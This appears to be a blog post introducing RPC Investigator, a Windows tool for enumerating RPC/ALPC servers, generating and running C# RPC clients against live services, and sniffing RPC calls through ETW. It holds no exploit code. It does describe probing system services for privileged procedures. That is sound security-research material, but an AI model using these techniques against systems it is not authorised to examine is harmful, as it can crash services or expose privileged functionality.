A few years ago, the developer of the open source .NET library NtApiDotNet, James Forshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new NtApiDotNet functionality via PowerShell scripts and cmdlets in his NtObjectManager package—he included a small section on how to use the PowerShell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the NtApiDotNet platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integrating symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from NtApiDotNet, we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking Edit -> Settings. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path srv*c:\symbols*https://msdl.microsoft.com/download/symbols).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically C:\Users\(user)\AppData\Roaming\RpcInvestigator. To view this folder, simply navigate to View -> Logs. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (and there are most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the File -> All RPC ALPC Servers… menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC servers) by parsing the server’s image: select File -> Load from binary… and locate the image on disk, or select File -> Load from service… and pick the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item Library -> Servers to view all discovered RPC servers and Library -> Procedures to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to Library -> Refresh, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded, and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item Library -> Erase or manually delete the database file (rpcserver.db) inside the current user’s roaming application data folder. Note that RPC servers discovered through the File -> Load from binary… and File -> Load from service… menu items are automatically added to the library.

You can also export the entire library as text by selecting Library -> Export as Text.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select New Client.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by NtApiDotNet. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”.

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago, ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets, and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to Tools -> RPC Sniffer… and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select Open in library or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”